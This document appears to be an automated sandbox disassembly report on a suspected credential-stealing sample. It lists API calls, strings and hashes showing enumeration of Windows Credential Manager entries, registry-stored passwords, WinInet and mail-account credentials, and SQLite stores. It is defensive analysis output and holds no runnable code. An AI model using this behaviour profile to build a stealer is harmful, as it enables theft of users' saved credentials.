                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                                                                    • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                                                                    • API String ID: 1012775001-1343505058
                                                                                                    • Opcode ID: 9e23aae614ac24114fc18125b019b65eb6573faab22d4a721f00cae62469f9bb
                                                                                                    • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                                                                                                    • Opcode Fuzzy Hash: 9e23aae614ac24114fc18125b019b65eb6573faab22d4a721f00cae62469f9bb
                                                                                                    • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00444612
                                                                                                      • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                                    • strlen.MSVCRT ref: 0044462E
                                                                                                    • memset.MSVCRT ref: 00444668
                                                                                                    • memset.MSVCRT ref: 0044467C
                                                                                                    • memset.MSVCRT ref: 00444690
                                                                                                    • memset.MSVCRT ref: 004446B6
                                                                                                      • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                                      • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                                    • memcpy.MSVCRT(?,00000000,00000008,?,?,?,00000000,000003FF,?,00000000,0000041E,?,00000000,0000041E,?,00000000), ref: 004446ED
                                                                                                      • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                      • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                                    • memcpy.MSVCRT(?,?,00000010,?,?), ref: 00444729
                                                                                                    • memcpy.MSVCRT(?,?,00000008,?,?,00000010,?,?), ref: 0044473B
                                                                                                    • _mbscpy.MSVCRT(?,?), ref: 00444812
                                                                                                    • memcpy.MSVCRT(?,?,00000004,?,?,?,?), ref: 00444843
                                                                                                    • memcpy.MSVCRT(?,?,00000004,?,?,00000004,?,?,?,?), ref: 00444855
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpymemset$strlen$_mbscpy
                                                                                                    • String ID: salu
                                                                                                    • API String ID: 3691931180-4177317985
                                                                                                    • Opcode ID: b7cf63fef92e37f4bb0d3b69adaea4b1cc931356000d291c0cdd30d7a2f6e4ad
                                                                                                    • Instruction ID: b87b4f34a2d3e3c1159852785770864cc269bb22f3616182f1b5584d27518a2a
                                                                                                    • Opcode Fuzzy Hash: b7cf63fef92e37f4bb0d3b69adaea4b1cc931356000d291c0cdd30d7a2f6e4ad
                                                                                                    • Instruction Fuzzy Hash: 65713D7190015DAADB10EBA5CC81ADEB7B8FF44348F1444BAF648E7141DB38AB498F95
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$Library$FreeLoad
                                                                                                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                                                    • API String ID: 2449869053-232097475
                                                                                                    • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                                    • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                                                                                                    • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                                    • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                                                                                                    APIs
                                                                                                    • RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                                                                                    • memset.MSVCRT ref: 0040F84A
                                                                                                    • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0040F877
                                                                                                    • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F8A0
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040F919
                                                                                                    • LocalFree.KERNEL32(?), ref: 0040F92C
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0040F937
                                                                                                    • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
                                                                                                    • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Creds$ps:password
                                                                                                    • API String ID: 551151806-1288872324
                                                                                                    • Opcode ID: 30fd5f6f20630edc1b24d3ff7a692dcad865f59df878495865e1d580aa018547
                                                                                                    • Instruction ID: 67353d5813bb88842fab764933eebe3fab3d63e3b23d31051d6557c10b379f88
                                                                                                    • Opcode Fuzzy Hash: 30fd5f6f20630edc1b24d3ff7a692dcad865f59df878495865e1d580aa018547
                                                                                                    • Instruction Fuzzy Hash: 71412BB6901209AFDB61DF95DC84EEFBBBCEB48715F0000B6F905E2150DA349A54CF64
                                                                                                    APIs
                                                                                                    • sprintf.MSVCRT ref: 0040957B
                                                                                                    • LoadMenuA.USER32(?,?), ref: 00409589
                                                                                                      • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                                                                                                      • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                                                                                                      • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                                                                                                      • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                                                                                                    • DestroyMenu.USER32(00000000), ref: 004095A7
                                                                                                    • sprintf.MSVCRT ref: 004095EB
                                                                                                    • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                                                                                                    • memset.MSVCRT ref: 0040961C
                                                                                                    • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                                                                                                    • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                                                                                                    • DestroyWindow.USER32(00000000), ref: 0040965C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                                                                    • String ID: caption$dialog_%d$menu_%d
                                                                                                    • API String ID: 3259144588-3822380221
                                                                                                    • Opcode ID: 28b324c1556d4b5440d18e0b4d206da1123046d85e66521c8e04ac1cff3212ab
                                                                                                    • Instruction ID: e9c2f3b5cfdd7c6c8f350bf48a14ef17ef5fca4d90bdc7cc97d58e5e48f5f72a
                                                                                                    • Opcode Fuzzy Hash: 28b324c1556d4b5440d18e0b4d206da1123046d85e66521c8e04ac1cff3212ab
                                                                                                    • Instruction Fuzzy Hash: 5C212672901288BFDB129F509C81EAF3768FB09305F044076FA01A1192E7B99D548B6E
                                                                                                    APIs
                                                                                                      • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                                                                                                    • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                    • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                    • GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                    • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                    • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                    • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$Library$FreeLoad
                                                                                                    • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                                                                    • API String ID: 2449869053-4258758744
                                                                                                    • Opcode ID: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                                    • Instruction ID: 2cc24b9197253aa622afa6144fd2e07652f81762edb29d5cb7a2b3ace442d85c
                                                                                                    • Opcode Fuzzy Hash: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                                    • Instruction Fuzzy Hash: 12014FB49017009ADB30AF75C809B46BBE0EFA9704F214C2FE295A3691E77ED445CF88
                                                                                                    APIs
                                                                                                    • wcsstr.MSVCRT ref: 0040426A
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                                                                                                    • _mbscpy.MSVCRT(?,?), ref: 004042D5
                                                                                                    • _mbscpy.MSVCRT(?,?,?,?), ref: 004042E8
                                                                                                    • strchr.MSVCRT ref: 004042F6
                                                                                                    • strlen.MSVCRT ref: 0040430A
                                                                                                    • sprintf.MSVCRT ref: 0040432B
                                                                                                    • strchr.MSVCRT ref: 0040433C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                                                                                    • String ID: %s@gmail.com$www.google.com
                                                                                                    • API String ID: 3866421160-4070641962
                                                                                                    • Opcode ID: 1edbde93058757da684035df5ff447e14cead6821ca445e74965780bbbdd419f
                                                                                                    • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                                                                                                    • Opcode Fuzzy Hash: 1edbde93058757da684035df5ff447e14cead6821ca445e74965780bbbdd419f
                                                                                                    • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                                                                                                    APIs
                                                                                                    • _mbscpy.MSVCRT(0045A448,00000000,00000000,00000000,?,?,00409862,00000000,?,00000000,00000104,?), ref: 00409749
                                                                                                    • _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,00000000,00000000,?,?,00409862,00000000,?,00000000,00000104,?), ref: 00409759
                                                                                                      • Part of subcall function 0040930C: memset.MSVCRT ref: 00409331
                                                                                                      • Part of subcall function 0040930C: GetPrivateProfileStringA.KERNEL32(0045A550,00000104,0044C52F,?,00001000,0045A448), ref: 00409355
                                                                                                      • Part of subcall function 0040930C: WritePrivateProfileStringA.KERNEL32(0045A550,?,?,0045A448), ref: 0040936C
                                                                                                    • EnumResourceNamesA.KERNEL32(00000104,00000004,0040955A,00000000), ref: 0040978F
                                                                                                    • EnumResourceNamesA.KERNEL32(00000104,00000005,0040955A,00000000), ref: 00409799
                                                                                                    • _mbscpy.MSVCRT(0045A550,strings,?,00409862,00000000,?,00000000,00000104,?), ref: 004097A1
                                                                                                    • memset.MSVCRT ref: 004097BD
                                                                                                    • LoadStringA.USER32(00000104,00000000,?,00001000), ref: 004097D1
                                                                                                      • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                                                                                    • String ID: TranslatorName$TranslatorURL$general$strings
                                                                                                    • API String ID: 1035899707-3647959541
                                                                                                    • Opcode ID: a0ec869b2dd78c9688f5c4aeae5101ac8de8338f716e64c62a8758e97b5b0f37
                                                                                                    • Instruction ID: 9d87356d66cebc64c7ffc1a8588b7925a858c7ffbf95e02bf5fcf8d8eff5f455
                                                                                                    • Opcode Fuzzy Hash: a0ec869b2dd78c9688f5c4aeae5101ac8de8338f716e64c62a8758e97b5b0f37
                                                                                                    • Instruction Fuzzy Hash: F711C87290016475F7312B569C46F9B3F5CDBCAB55F10007BBB08A71C3D6B89D408AAD
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                                                                                    • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                                    • API String ID: 2360744853-2229823034
                                                                                                    • Opcode ID: b98e279298427c20d80c092d066d5e90b39ad4a4c54a31d4adca6ea1b8d7f224
                                                                                                    • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                                                                                                    • Opcode Fuzzy Hash: b98e279298427c20d80c092d066d5e90b39ad4a4c54a31d4adca6ea1b8d7f224
                                                                                                    • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                                                                                                    APIs
                                                                                                    • strchr.MSVCRT ref: 004100E4
                                                                                                    • _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                                      • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                                      • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                                                      • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                                    • _mbscpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 00410142
                                                                                                    • _mbscat.MSVCRT ref: 0041014D
                                                                                                    • memset.MSVCRT ref: 00410129
                                                                                                      • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                                                                                      • Part of subcall function 0040715B: _mbscpy.MSVCRT(00000000,0045AA00,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407180
                                                                                                    • memset.MSVCRT ref: 00410171
                                                                                                    • memcpy.MSVCRT(?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0041018C
                                                                                                    • _mbscat.MSVCRT ref: 00410197
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                                                    • String ID: \systemroot
                                                                                                    • API String ID: 912701516-1821301763
                                                                                                    • Opcode ID: 6597b15a16a773eef37e6b590fdc8d99fee9a87505121146da4ae3bca3d5ad9a
                                                                                                    • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                                                                                                    • Opcode Fuzzy Hash: 6597b15a16a773eef37e6b590fdc8d99fee9a87505121146da4ae3bca3d5ad9a
                                                                                                    • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                                                                                                    APIs
                                                                                                    • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                                    • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410916
                                                                                                    • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                                    • memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                                                    • CoTaskMemFree.COMBASE(00000000), ref: 00410970
                                                                                                    Strings
                                                                                                    • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041090A
                                                                                                    • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0041091E
                                                                                                    • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410911
                                                                                                    • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 004108FD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FromStringUuid$FreeTaskmemcpy
                                                                                                    • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                                                                                                    • API String ID: 1640410171-2022683286
                                                                                                    • Opcode ID: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                                                                                                    • Instruction ID: 9e6d0ab6f4d779539f8eb1da53a4fb6c135c1230b89e6f6df403d509513a9b08
                                                                                                    • Opcode Fuzzy Hash: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                                                                                                    • Instruction Fuzzy Hash: AD1151B391011DAAEF11EEA5DC80EEB37ACAB45350F040027F951E3251E6B4D9458BA5
                                                                                                    APIs
                                                                                                      • Part of subcall function 00412F93: strlen.MSVCRT ref: 00412FA1
                                                                                                    • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041983C
                                                                                                    • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041985B
                                                                                                    • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041986D
                                                                                                    • memcpy.MSVCRT(?,-journal,0000000A,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 00419885
                                                                                                    • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 004198A2
                                                                                                    • memcpy.MSVCRT(?,-wal,00000005,?,?,?,?,?,?,?,?,?,00000000,00000000,004067AF), ref: 004198BA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy$strlen
                                                                                                    • String ID: -journal$-wal$immutable$nolock
                                                                                                    • API String ID: 2619041689-3408036318
                                                                                                    • Opcode ID: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                                                    • Instruction ID: 25f2131b2e7268d2841c48c11c9a86e68458d3caa4be6fdea11427aceae17f40
                                                                                                    • Opcode Fuzzy Hash: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                                                    • Instruction Fuzzy Hash: 9FC1D1B1A04606EFDB14DFA5C841BDEFBB0BF45314F14815EE528A7381D778AA90CB98
                                                                                                    APIs
                                                                                                      • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                    • wcslen.MSVCRT ref: 0040874A
                                                                                                    • wcsncmp.MSVCRT ref: 00408794
                                                                                                    • memset.MSVCRT ref: 0040882A
                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?), ref: 00408849
                                                                                                    • wcschr.MSVCRT ref: 0040889F
                                                                                                    • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$FreeLibraryLoadLocalmemcpymemsetwcschrwcslenwcsncmp
                                                                                                    • String ID: J$Microsoft_WinInet
                                                                                                    • API String ID: 3318079752-260894208
                                                                                                    • Opcode ID: f0bd6c6ea0acb8351c112a80c86d09cf3e17917a0d28c26bc0fcaaf70a278575
                                                                                                    • Instruction ID: 28b95496509cbb6d8c3a882eeb8be19e6e579a4afcb86d24d1cb248b0f397b1b
                                                                                                    • Opcode Fuzzy Hash: f0bd6c6ea0acb8351c112a80c86d09cf3e17917a0d28c26bc0fcaaf70a278575
                                                                                                    • Instruction Fuzzy Hash: 9E5127B16083469FD710EF65C981A5BB7E8FF89304F40492EF998D3251EB38E944CB5A
                                                                                                    APIs
                                                                                                      • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                                                                                    • _mbscpy.MSVCRT(0045A448,00000000,00000000,00000000,0040972B,00000000,?,00000000,00000104,?), ref: 00409686
                                                                                                    • _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,00000000,00000000,0040972B,00000000,?,00000000,00000104,?), ref: 00409696
                                                                                                    • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                                                                                                      • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: PrivateProfile_mbscpy$AttributesFileString
                                                                                                    • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                    • API String ID: 888011440-2039793938
                                                                                                    • Opcode ID: bcaacaf8b0ae019c7a44cf7c189e97e1f6c6f5de2524552f312430b312ca54f0
                                                                                                    • Instruction ID: 35163425d10a67bbe8c9c36fe52ba00322d2719519e04c12929343b9a05e3383
                                                                                                    • Opcode Fuzzy Hash: bcaacaf8b0ae019c7a44cf7c189e97e1f6c6f5de2524552f312430b312ca54f0
                                                                                                    • Instruction Fuzzy Hash: 51F09621EC021636EA113A315C47F6E75148F91B16F1546BBBD057B2C3EA6C8D21819F
                                                                                                    APIs
                                                                                                    Strings
